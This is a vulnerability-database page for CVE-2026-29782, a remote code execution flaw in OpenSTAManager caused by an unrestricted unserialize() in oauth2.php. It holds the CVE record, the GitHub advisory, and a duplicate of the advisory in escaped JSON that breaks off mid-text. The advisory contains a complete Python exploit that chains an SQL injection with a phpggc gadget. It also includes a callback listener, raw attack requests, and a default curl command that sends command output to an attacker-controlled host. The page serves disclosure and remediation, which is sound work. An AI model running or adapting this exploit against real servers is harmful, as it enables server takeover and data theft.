Vulnerability-Lookup

CVE-2026-29782 (GCVE-0-2026-29782)

Vulnerability from cvelistv5 – Published: 2026-04-02 13:42 – Updated: 2026-04-03 19:52

Title

OpenSTAManager: Remote Code Execution via Insecure Deserialization in OAuth2

Summary

OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the oauth2.php file in OpenSTAManager is an unauthenticated endpoint ($skip_permissions = true). It loads a record from the zz_oauth2 table using the attacker-controlled GET parameter state, and during the OAuth2 configuration flow calls unserialize() on the access_token field without any class restriction. This issue has been patched in version 2.10.2.

Severity ?

7.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Assigner

GitHub_M

References

URL

Tags

	https://github.com/devcode-it/openstamanager/secu…	x_refsource_CONFIRM
	https://github.com/devcode-it/openstamanager/comm…	x_refsource_MISC
	https://github.com/devcode-it/openstamanager/rele…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	devcode-it	openstamanager	Affected: < 2.10.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-29782",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-03T19:52:40.565184Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-03T19:52:52.158Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "openstamanager",
          "vendor": "devcode-it",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.10.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the oauth2.php file in OpenSTAManager is an unauthenticated endpoint ($skip_permissions = true). It loads a record from the zz_oauth2 table using the attacker-controlled GET parameter state, and during the OAuth2 configuration flow calls unserialize() on the access_token field without any class restriction. This issue has been patched in version 2.10.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-02T13:42:25.134Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g"
        },
        {
          "name": "https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc"
        },
        {
          "name": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
        }
      ],
      "source": {
        "advisory": "GHSA-whv5-4q2f-q68g",
        "discovery": "UNKNOWN"
      },
      "title": "OpenSTAManager: Remote Code Execution via Insecure Deserialization in OAuth2"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-29782",
    "datePublished": "2026-04-02T13:42:25.134Z",
    "dateReserved": "2026-03-04T16:26:02.898Z",
    "dateUpdated": "2026-04-03T19:52:52.158Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-29782",
      "date": "2026-04-16",
      "epss": "0.00108",
      "percentile": "0.29025"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-29782\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-02T14:16:27.237\",\"lastModified\":\"2026-04-07T21:19:46.627\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the oauth2.php file in OpenSTAManager is an unauthenticated endpoint ($skip_permissions = true). It loads a record from the zz_oauth2 table using the attacker-controlled GET parameter state, and during the OAuth2 configuration flow calls unserialize() on the access_token field without any class restriction. This issue has been patched in version 2.10.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.10.2\",\"matchCriteriaId\":\"37690084-64E6-4E8B-8A92-8B55C8FC1E9F\"}]}]}],\"references\":[{\"url\":\"https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-29782\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-03T19:52:40.565184Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-03T19:52:47.217Z\"}}], \"cna\": {\"title\": \"OpenSTAManager: Remote Code Execution via Insecure Deserialization in OAuth2\", \"source\": {\"advisory\": \"GHSA-whv5-4q2f-q68g\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"devcode-it\", \"product\": \"openstamanager\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.10.2\"}]}], \"references\": [{\"url\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g\", \"name\": \"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc\", \"name\": \"https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\", \"name\": \"https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the oauth2.php file in OpenSTAManager is an unauthenticated endpoint ($skip_permissions = true). It loads a record from the zz_oauth2 table using the attacker-controlled GET parameter state, and during the OAuth2 configuration flow calls unserialize() on the access_token field without any class restriction. This issue has been patched in version 2.10.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-02T13:42:25.134Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-29782\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-03T19:52:52.158Z\", \"dateReserved\": \"2026-03-04T16:26:02.898Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-02T13:42:25.134Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-WHV5-4Q2F-Q68G

Vulnerability from github – Published: 2026-04-01 19:46 – Updated: 2026-04-06 17:17

Summary

OpenSTAManager Affected by Remote Code Execution via Insecure Deserialization in OAuth2

Details

Description

The oauth2.php file in OpenSTAManager is an unauthenticated endpoint ($skip_permissions = true). It loads a record from the zz_oauth2 table using the attacker-controlled GET parameter state, and during the OAuth2 configuration flow calls unserialize() on the access_token field without any class restriction.

An attacker who can write to the zz_oauth2 table (e.g., via the arbitrary SQL injection in the Aggiornamenti module reported in GHSA-2fr7-cc4f-wh98) can insert a malicious serialized PHP object (gadget chain) that upon deserialization executes arbitrary commands on the server as the www-data user.

Affected code

Entry point — `oauth2.php`

$skip_permissions = true;                              // Line 23: NO AUTHENTICATION
include_once __DIR__.'/core.php';

$state = $_GET['state'];                               // Line 28: attacker-controlled
$code = $_GET['code'];

$account = OAuth2::where('state', '=', $state)->first(); // Line 33: fetches injected record
$response = $account->configure($code, $state);          // Line 51: triggers the chain

Deserialization — `src/Models/OAuth2.php`

// Line 193 (checkTokens):
$access_token = $this->access_token ? unserialize($this->access_token) : null;

// Line 151 (getAccessToken):
return $this->attributes['access_token'] ? unserialize($this->attributes['access_token']) : null;

unserialize() is called without the allowed_classes parameter, allowing instantiation of any class loaded by the Composer autoloader.

Execution flow

oauth2.php (no auth)
  → configure()
    → needsConfiguration()
      → getAccessToken()
        → checkTokens()
          → unserialize($this->access_token)   ← attacker payload
            → Creates PendingBroadcast object (Laravel/RCE22 gadget chain)
          → $access_token->hasExpired()         ← PendingBroadcast lacks this method → PHP Error
        → During error cleanup:
          → PendingBroadcast.__destruct()       ← fires during shutdown
            → system($command)                  ← RCE

The HTTP response is 500 (due to the hasExpired() error), but the command has already executed via __destruct() during error cleanup.

Full attack chain

This vulnerability is combined with the arbitrary SQL injection in the Aggiornamenti module (GHSA-2fr7-cc4f-wh98) to achieve unauthenticated RCE:

Payload injection (requires admin account): Via op=risolvi-conflitti-database, arbitrary SQL is executed to insert a malicious serialized object into zz_oauth2.access_token
RCE trigger (unauthenticated): A GET request to oauth2.php?state=<known_value>&code=x triggers the deserialization and executes the command

Persistence note: The risolvi-conflitti-database handler ends with exit; (line 128), which prevents the outer transaction commit. DML statements (INSERT) would be rolled back. To persist the INSERT, DDL statements (CREATE TABLE/DROP TABLE) are included to force an implicit MySQL commit.

Gadget chain

The chain used is Laravel/RCE22 (available in phpggc), which exploits classes from the Laravel framework present in the project's dependencies:

PendingBroadcast.__destruct()
  → $this->events->dispatch($this->event)
  → chain of __call() / __invoke()
  → system($command)

Proof of Concept

Execution

Terminal 1 — Attacker listener:

python3 listener.py --port 9999

Terminal 2 — Exploit:

python3 exploit.py \
  --target http://localhost:8888 \
  --callback http://host.docker.internal:9999 \
  --user admin --password <password>

Observed result

Listener receives: The id command was executed on the server as www-data, confirming RCE.

HTTP requests from the exploit

Step 4 — Injection (authenticated):

POST /actions.php HTTP/1.1
Cookie: PHPSESSID=<session>
Content-Type: application/x-www-form-urlencoded

op=risolvi-conflitti-database&id_module=6&queries=["DELETE FROM zz_oauth2 WHERE state='poc-xxx'","INSERT INTO zz_oauth2 (id,name,class,client_id,client_secret,config,state,access_token,after_configuration,is_login,enabled) VALUES (99999,'poc','Modules\\\\Emails\\\\OAuth2\\\\Google','x','x','{}','poc-xxx',0x<payload_hex>,'',0,1)","CREATE TABLE IF NOT EXISTS _t(i INT)","DROP TABLE IF EXISTS _t"]

Step 5 — Trigger (NO authentication):

GET /oauth2.php?state=poc-xxx&code=x HTTP/1.1

(No cookies — completely anonymous request)

Response: HTTP 500 (expected — the error occurs after __destruct() has already executed the command)

Exploit — `exploit.py`

#!/usr/bin/env python3
"""
OpenSTAManager v2.10.1 — RCE PoC (Arbitrary SQL → Insecure Deserialization)

Usage:
  python3 listener.py --port 9999
  python3 exploit.py --target http://localhost:8888 --callback http://host.docker.internal:9999 --user admin --password Test1234
"""

import argparse
import json
import random
import re
import string
import subprocess
import sys
import time

try:
    import requests
except ImportError:
    print("[!] pip install requests")
    sys.exit(1)

RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
BOLD = "\033[1m"
DIM = "\033[2m"
RESET = "\033[0m"

BANNER = f"""
  {RED}{'=' * 58}{RESET}
  {RED}{BOLD}  OpenSTAManager v2.10.1 — RCE Proof of Concept{RESET}
  {RED}{BOLD}  Arbitrary SQL → Insecure Deserialization{RESET}
  {RED}{'=' * 58}{RESET}
"""


def log(msg, status="*"):
    icons = {"*": f"{BLUE}*{RESET}", "+": f"{GREEN}+{RESET}", "-": f"{RED}-{RESET}", "!": f"{YELLOW}!{RESET}"}
    print(f"  [{icons.get(status, '*')}] {msg}")


def step_header(num, title):
    print(f"\n  {BOLD}── Step {num}: {title} ──{RESET}\n")


def generate_payload(container, command):
    step_header(1, "Generate Gadget Chain Payload")

    log("Checking phpggc in container...")
    result = subprocess.run(["docker", "exec", container, "test", "-f", "/tmp/phpggc/phpggc"], capture_output=True)
    if result.returncode != 0:
        log("Installing phpggc...", "!")
        proc = subprocess.run(
            ["docker", "exec", container, "git", "clone", "https://github.com/ambionics/phpggc", "/tmp/phpggc"],
            capture_output=True, text=True,
        )
        if proc.returncode != 0:
            log(f"Failed to install phpggc: {proc.stderr}", "-")
            sys.exit(1)

    log(f"Command: {DIM}{command}{RESET}")

    result = subprocess.run(
        ["docker", "exec", container, "php", "/tmp/phpggc/phpggc", "Laravel/RCE22", "system", command],
        capture_output=True,
    )
    if result.returncode != 0:
        log(f"phpggc failed: {result.stderr.decode()}", "-")
        sys.exit(1)

    payload_bytes = result.stdout
    log(f"Payload: {BOLD}{len(payload_bytes)} bytes{RESET}", "+")
    return payload_bytes


def authenticate(target, username, password):
    step_header(2, "Authenticate")
    session = requests.Session()
    log(f"Logging in as '{username}'...")

    resp = session.post(
        f"{target}/index.php",
        data={"op": "login", "username": username, "password": password},
        allow_redirects=False, timeout=10,
    )

    location = resp.headers.get("Location", "")
    if resp.status_code != 302 or "index.php" in location:
        log("Login failed! Wrong credentials or brute-force lockout (3 attempts / 180s).", "-")
        sys.exit(1)

    session.get(f"{target}{location}", timeout=10)
    log("Authenticated", "+")
    return session


def find_module_id(session, target, container):
    step_header(3, "Find 'Aggiornamenti' Module ID")
    log("Searching navigation sidebar...")
    resp = session.get(f"{target}/controller.php", timeout=10)

    for match in re.finditer(r'id_module=(\d+)', resp.text):
        snippet = resp.text[match.start():match.start() + 300]
        if re.search(r'[Aa]ggiornamenti', snippet):
            module_id = int(match.group(1))
            log(f"Module ID: {BOLD}{module_id}{RESET}", "+")
            return module_id

    log("Not found in sidebar, querying database...", "!")
    result = subprocess.run(
        ["docker", "exec", container, "php", "-r",
         "require '/var/www/html/config.inc.php'; "
         "$pdo = new PDO('mysql:host='.$db_host.';dbname='.$db_name, $db_username, $db_password); "
         "echo $pdo->query(\"SELECT id FROM zz_modules WHERE name='Aggiornamenti'\")->fetchColumn();"],
        capture_output=True, text=True,
    )
    if result.stdout.strip().isdigit():
        module_id = int(result.stdout.strip())
        log(f"Module ID: {BOLD}{module_id}{RESET}", "+")
        return module_id

    log("Could not find module ID", "-")
    sys.exit(1)


def inject_payload(session, target, module_id, payload_bytes, state_value):
    step_header(4, "Inject Payload via Arbitrary SQL")

    hex_payload = payload_bytes.hex()
    record_id = random.randint(90000, 99999)

    queries = [
        f"DELETE FROM zz_oauth2 WHERE id={record_id} OR state='{state_value}'",
        f"INSERT INTO zz_oauth2 "
        f"(id, name, class, client_id, client_secret, config, "
        f"state, access_token, after_configuration, is_login, enabled) VALUES "
        f"({record_id}, 'poc', 'Modules\\\\Emails\\\\OAuth2\\\\Google', "
        f"'x', 'x', '{{}}', '{state_value}', 0x{hex_payload}, '', 0, 1)",
        "CREATE TABLE IF NOT EXISTS _poc_ddl_commit (i INT)",
        "DROP TABLE IF EXISTS _poc_ddl_commit",
    ]

    log(f"State trigger: {BOLD}{state_value}{RESET}")
    log(f"Payload: {len(hex_payload)//2} bytes ({len(hex_payload)} hex)")
    log("Sending to actions.php...")

    resp = session.post(
        f"{target}/actions.php",
        data={"op": "risolvi-conflitti-database", "id_module": str(module_id), "id_record": "", "queries": json.dumps(queries)},
        timeout=15,
    )

    try:
        result = json.loads(resp.text)
        if result.get("success"):
            log("Payload planted in zz_oauth2.access_token", "+")
            return True
        else:
            log(f"Injection failed: {result.get('message', '?')}", "-")
            return False
    except json.JSONDecodeError:
        log(f"Unexpected response (HTTP {resp.status_code}): {resp.text[:200]}", "-")
        return False


def trigger_rce(target, state_value):
    step_header(5, "Trigger RCE (NO AUTHENTICATION)")

    url = f"{target}/oauth2.php"
    log(f"GET {url}?state={state_value}&code=x")
    log(f"{DIM}(This request is UNAUTHENTICATED){RESET}")

    try:
        resp = requests.get(url, params={"state": state_value, "code": "x"}, allow_redirects=False, timeout=15)
        log(f"HTTP {resp.status_code}", "+")
        if resp.status_code == 500:
            log(f"{DIM}500 expected: __destruct() fires the gadget chain before error handling{RESET}")
    except requests.exceptions.Timeout:
        log("Timed out (command may still have executed)", "!")
    except requests.exceptions.ConnectionError as e:
        log(f"Connection error: {e}", "-")


def main():
    parser = argparse.ArgumentParser(description="OpenSTAManager v2.10.1 — RCE PoC")
    parser.add_argument("--target", required=True, help="Target URL")
    parser.add_argument("--callback", required=True, help="Attacker listener URL reachable from the container")
    parser.add_argument("--user", default="admin", help="Username (default: admin)")
    parser.add_argument("--password", required=True, help="Password")
    parser.add_argument("--container", default="osm-web", help="Docker web container (default: osm-web)")
    parser.add_argument("--command", help="Custom command (default: curl callback with id output)")
    args = parser.parse_args()

    print(BANNER)

    target = args.target.rstrip("/")
    callback = args.callback.rstrip("/")
    state_value = "poc-" + "".join(random.choices(string.ascii_lowercase + string.digits, k=12))
    command = args.command or f"curl -s {callback}/rce-$(id|base64 -w0)"

    payload = generate_payload(args.container, command)
    session = authenticate(target, args.user, args.password)
    module_id = find_module_id(session, target, args.container)

    if not inject_payload(session, target, module_id, payload, state_value):
        log("Exploit failed at injection step", "-")
        sys.exit(1)

    time.sleep(1)
    trigger_rce(target, state_value)

    print(f"\n  {BOLD}── Result ──{RESET}\n")
    log("Exploit complete. Check your listener for the callback.", "+")
    log("Expected: GET /rce-<base64(id)>")
    log(f"If no callback, verify the container can reach: {callback}", "!")


if __name__ == "__main__":
    main()

Listener — `listener.py`

#!/usr/bin/env python3
"""OpenSTAManager v2.10.1 — RCE Callback Listener"""

import argparse
import base64
import sys
from datetime import datetime
from http.server import HTTPServer, BaseHTTPRequestHandler

RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
BOLD = "\033[1m"
RESET = "\033[0m"


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        ts = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print(f"\n  {RED}{'=' * 58}{RESET}")
        print(f"  {RED}{BOLD}  RCE CALLBACK RECEIVED{RESET}")
        print(f"  {RED}{'=' * 58}{RESET}")
        print(f"  {GREEN}[+]{RESET} Time : {ts}")
        print(f"  {GREEN}[+]{RESET} From : {self.client_address[0]}:{self.client_address[1]}")
        print(f"  {GREEN}[+]{RESET} Path : {self.path}")

        for part in self.path.lstrip("/").split("/"):
            if part.startswith("rce-"):
                try:
                    decoded = base64.b64decode(part[4:]).decode("utf-8", errors="replace")
                    print(f"  {GREEN}[+]{RESET} Output : {BOLD}{decoded}{RESET}")
                except Exception:
                    print(f"  {YELLOW}[!]{RESET} Raw : {part[4:]}")

        print(f"  {RED}{'=' * 58}{RESET}\n")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"OK")

    def do_POST(self):
        self.do_GET()

    def log_message(self, format, *args):
        pass


def main():
    parser = argparse.ArgumentParser(description="RCE callback listener")
    parser.add_argument("--port", type=int, default=9999, help="Listen port (default: 9999)")
    args = parser.parse_args()

    server = HTTPServer(("0.0.0.0", args.port), CallbackHandler)
    print(f"\n  {BLUE}{'=' * 58}{RESET}")
    print(f"  {BLUE}{BOLD}  OpenSTAManager v2.10.1 — RCE Callback Listener{RESET}")
    print(f"  {BLUE}{'=' * 58}{RESET}")
    print(f"  {GREEN}[+]{RESET} Listening on 0.0.0.0:{args.port}")
    print(f"  {YELLOW}[!]{RESET} Waiting for callback...\n")

    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print(f"\n  {YELLOW}[!]{RESET} Stopped.")
        sys.exit(0)


if __name__ == "__main__":
    main()

Impact

Confidentiality: Read server files, database credentials, API keys
Integrity: Write files, install backdoors, modify application code
Availability: Delete files, denial of service
Scope: Command execution as www-data allows pivoting to other systems on the network

Proposed remediation

Option A: Restrict `unserialize()` (recommended)

// src/Models/OAuth2.php — checkTokens() and getAccessToken()
$access_token = $this->access_token
    ? unserialize($this->access_token, ['allowed_classes' => [AccessToken::class]])
    : null;

Option B: Use safe serialization

Replace serialize()/unserialize() with json_encode()/json_decode() for storing OAuth2 tokens.

Option C: Authenticate `oauth2.php`

Remove $skip_permissions = true and require authentication for the OAuth2 callback endpoint, or validate the state parameter against a value stored in the user's session.

Credits

Omar Ramirez

Severity ?

7.2 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.10.1"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "devcode-it/openstamanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T19:46:50Z",
    "nvd_published_at": "2026-04-02T14:16:27Z",
    "severity": "HIGH"
  },
  "details": "## Description\n\nThe `oauth2.php` file in OpenSTAManager is an **unauthenticated** endpoint (`$skip_permissions = true`). It loads a record from the `zz_oauth2` table using the attacker-controlled GET parameter `state`, and during the OAuth2 configuration flow calls `unserialize()` on the `access_token` field **without any class restriction**.\n\nAn attacker who can write to the `zz_oauth2` table (e.g., via the arbitrary SQL injection in the Aggiornamenti module reported in [GHSA-2fr7-cc4f-wh98](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98)) can insert a malicious serialized PHP object (gadget chain) that upon deserialization executes arbitrary commands on the server as the `www-data` user.\n\n## Affected code\n\n### Entry point \u2014 `oauth2.php`\n\n```php\n$skip_permissions = true;                              // Line 23: NO AUTHENTICATION\ninclude_once __DIR__.\u0027/core.php\u0027;\n\n$state = $_GET[\u0027state\u0027];                               // Line 28: attacker-controlled\n$code = $_GET[\u0027code\u0027];\n\n$account = OAuth2::where(\u0027state\u0027, \u0027=\u0027, $state)-\u003efirst(); // Line 33: fetches injected record\n$response = $account-\u003econfigure($code, $state);          // Line 51: triggers the chain\n```\n\n### Deserialization \u2014 `src/Models/OAuth2.php`\n\n```php\n// Line 193 (checkTokens):\n$access_token = $this-\u003eaccess_token ? unserialize($this-\u003eaccess_token) : null;\n\n// Line 151 (getAccessToken):\nreturn $this-\u003eattributes[\u0027access_token\u0027] ? unserialize($this-\u003eattributes[\u0027access_token\u0027]) : null;\n```\n\n`unserialize()` is called without the `allowed_classes` parameter, allowing instantiation of any class loaded by the Composer autoloader.\n\n## Execution flow\n\n```\noauth2.php (no auth)\n  \u2192 configure()\n    \u2192 needsConfiguration()\n      \u2192 getAccessToken()\n        \u2192 checkTokens()\n          \u2192 unserialize($this-\u003eaccess_token)   \u2190 attacker payload\n            \u2192 Creates PendingBroadcast object (Laravel/RCE22 gadget chain)\n          \u2192 $access_token-\u003ehasExpired()         \u2190 PendingBroadcast lacks this method \u2192 PHP Error\n        \u2192 During error cleanup:\n          \u2192 PendingBroadcast.__destruct()       \u2190 fires during shutdown\n            \u2192 system($command)                  \u2190 RCE\n```\n\nThe HTTP response is 500 (due to the `hasExpired()` error), but the command has already executed via `__destruct()` during error cleanup.\n\n## Full attack chain\n\nThis vulnerability is combined with the arbitrary SQL injection in the Aggiornamenti module ([GHSA-2fr7-cc4f-wh98](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98)) to achieve unauthenticated RCE:\n\n1. **Payload injection** (requires admin account): Via `op=risolvi-conflitti-database`, arbitrary SQL is executed to insert a malicious serialized object into `zz_oauth2.access_token`\n2. **RCE trigger** (unauthenticated): A GET request to `oauth2.php?state=\u003cknown_value\u003e\u0026code=x` triggers the deserialization and executes the command\n\n**Persistence note**: The `risolvi-conflitti-database` handler ends with `exit;` (line 128), which prevents the outer transaction commit. DML statements (INSERT) would be rolled back. To persist the INSERT, DDL statements (`CREATE TABLE`/`DROP TABLE`) are included to force an implicit MySQL commit.\n\n## Gadget chain\n\nThe chain used is **Laravel/RCE22** (available in [phpggc](https://github.com/ambionics/phpggc)), which exploits classes from the Laravel framework present in the project\u0027s dependencies:\n\n```\nPendingBroadcast.__destruct()\n  \u2192 $this-\u003eevents-\u003edispatch($this-\u003eevent)\n  \u2192 chain of __call() / __invoke()\n  \u2192 system($command)\n```\n\n## Proof of Concept\n\n### Execution\n\n**Terminal 1** \u2014 Attacker listener:\n```bash\npython3 listener.py --port 9999\n```\n\n**Terminal 2** \u2014 Exploit:\n```bash\npython3 exploit.py \\\n  --target http://localhost:8888 \\\n  --callback http://host.docker.internal:9999 \\\n  --user admin --password \u003cpassword\u003e\n```\n\u003cimg width=\"638\" height=\"722\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e949b641-7986-44b9-acbf-1c5dd0f7ef1f\" /\u003e\n\n### Observed result\n\n**Listener receives:**\n\u003cimg width=\"683\" height=\"286\" alt=\"image\" src=\"https://github.com/user-attachments/assets/89a78f7e-5f23-435d-97ec-d74ac905cdc1\" /\u003e\nThe `id` command was executed on the server as `www-data`, confirming RCE.\n\n### HTTP requests from the exploit\n\n**Step 4 \u2014 Injection (authenticated):**\n```\nPOST /actions.php HTTP/1.1\nCookie: PHPSESSID=\u003csession\u003e\nContent-Type: application/x-www-form-urlencoded\n\nop=risolvi-conflitti-database\u0026id_module=6\u0026queries=[\"DELETE FROM zz_oauth2 WHERE state=\u0027poc-xxx\u0027\",\"INSERT INTO zz_oauth2 